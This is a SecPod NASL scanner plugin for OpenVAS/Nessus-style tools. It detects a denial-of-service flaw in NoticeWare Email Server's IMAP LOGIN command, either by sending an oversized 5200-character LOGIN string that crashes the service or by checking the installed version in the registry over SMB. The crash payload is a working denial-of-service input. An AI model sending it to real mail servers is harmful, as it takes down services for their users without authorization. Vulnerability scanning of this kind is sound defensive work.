#############################################################################
#
#  NoticeWare Email Server NG LOGIN Messages DoS Vulnerability
#
#  Copyright: SecPod
#
#  Date Written: 2008/08/12
#
#  Revision: 1.1 
#
#  Log: schandan
#  Issue #0109
#  ------------------------------------------------------------------------
#  This program was written by SecPod and is licensed under the GNU GPL 
#  license. Please refer to the below link for details,
#  http://www.gnu.org/licenses/gpl.html
#  This header contains information regarding licensing terms under the GPL, 
#  and information regarding obtaining source code from the Author. 
#  Consequently, pursuant to section 3(c) of the GPL, you must accompany the 
#  information found in this header with any distribution you make of this 
#  Program.
#  ------------------------------------------------------------------------
##############################################################################


if(description)
{
 script_id(900027);
 script_bugtraq_id(30605);
 script_copyright(english:"Copyright (C) 2008 SecPod");
 script_version("$Revision: 1.1 $");
 script_category(ACT_MIXED_ATTACK);
 script_family(english:"Denial of Service");
 script_name(english:"NoticeWare Email Server NG LOGIN Messages DoS Vulnerability");
 script_summary(english:"Check for the version and exploit NoticeWare Email Server");
 desc["english"] = "
 Overview : The host is running NoticeWare Email Server, which is prone to
 denial of service vulnerability.

 Vulnerability Insight:

        Security flaw is due to improper bounds checking of the user supplied
        data to imap LOGIN command (Long string of 5000 characters on tcp/143).

        Impact : Remote attackers can crash or deny the service by executing
        long LOGIN string.

 Impact Level : Application

 Affected Software/OS:
        Noticeware Email Server 4.6.3 and prior on Windows (All).

 Fix : Upgrade to Noticeware Email Server 5.1,
 http://www.noticeware.com/downloads.htm

 References : http://www.securityfocus.com/archive/1/495259

 CVSS Score :
        CVSS Base Score     : 7.1 (AV:N/AC:M/Au:NR/C:N/I:N/A:C)
        CVSS Temporal Score : 5.6
 Risk factor : High";

 script_description(english:desc["english"]);
 script_dependencies("find_service.nes", "secpod_reg_enum.nasl");
 script_require_keys("SMB/WindowsVersion");
 exit(0);
}


 include("smb_nt.inc");
 include("imap_func.inc");

 imap_port = get_kb_item("Services/imap");
 if(!imap_port){
	imap_port = 143;
 }

 if(!get_port_state(imap_port)){
        exit(0);
 }

 if(!get_kb_item("SMB/WindowsVersion")){
        exit(0);
 }

 banner = get_imap_banner(port:imap_port);
 if("NoticeWare" >!< banner){
	exit(0);
 }

 if(!safe_checks())
 {
	sock = open_sock_tcp(imap_port);
        if(!sock){
		exit(0);
	}

	data = string("A001 LOGIN ", crap(data:"A", length:5200), " \r\n");
        send(socket:sock, data:data);
        rcv = recv(socket:sock, length:1024);
        close(sock);
	sleep(20);

        sock = open_sock_tcp(imap_port);
        if(sock)
        {
		send(socket:sock, data:data);
                rcv = recv(socket:sock, length:1024);
                close(sock);
        }

	if("NoticeWare" >!< rcv){
		security_hole(imap_port);
		security_note(data:string("NoticeWare Email Server service has been " +
					  "crashed on the target system.\nRestart the " +
					  "service to resume normal operations."),
			      port:imap_port);

	} 
	exit(0);
 }

 # Check for NoticeWare EmailServer Installation
 if(!registry_key_exists(key:"SOFTWARE\NoticeWare\EmailServer")){
	exit(0);
 }

 name = kb_smb_name();
 login = kb_smb_login();
 domain = kb_smb_domain();
 pass = kb_smb_password();
 port = kb_smb_transport();
 
 soc = open_sock_tcp(port);
 if(!soc){
        exit(0); 
 }

 r = smb_session_request(soc:soc, remote:name);
 if(!r){
        close(soc);
        exit(0);
 }
 
 prot = smb_neg_prot(soc:soc) ;
 if(!prot){
        close(soc);
        exit(0);
 }
 
 r = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);
 if(!r)
 {
	close(soc);
        exit(0);
 }

 uid = session_extract_uid(reply:r);
 r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$");

 tid = tconx_extract_tid(reply:r);
 if (!tid){
        close(soc);
        exit(0);
 }

 r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg");
 if(!r){
        close(soc);
        exit(0);
 }

 pipe = smbntcreatex_extract_pipe(reply:r);
 if (!pipe){
        close(soc);
        exit(0);
 }

 r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe);
 if(!r){
        close(soc);
        exit(0);
 }

 handle = registry_open_hklm(soc:soc, uid:uid, tid:tid, pipe:pipe);
 if(!handle){
        close(soc);
        exit(0);
 }

 key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\";
 key_h = registry_get_key(soc:soc, uid:uid ,tid:tid ,pipe:pipe,key:key,reply:handle);
 if(!key_h){
	close(soc);
        exit(0);
 }

 entries = registry_enum_key(soc:soc, uid:uid, tid:tid, pipe:pipe, reply:key_h);
 close(soc);

 foreach entry (entries)
 {
        mailName = registry_get_sz(key:key + entry, item:"DisplayName");
        if("NoticeWare Email Server" >< mailName)
        {
		mailVer = registry_get_sz(key:key + entry, item:"DisplayVersion");
                if(egrep(pattern:"^([0-3]\..*|4\.[0-5](\..*)?|4\.6(\.[0-3])?)$",
			 string:mailVer)){
                        security_hole(imap_port);
                }
                exit(0);
        }
 }
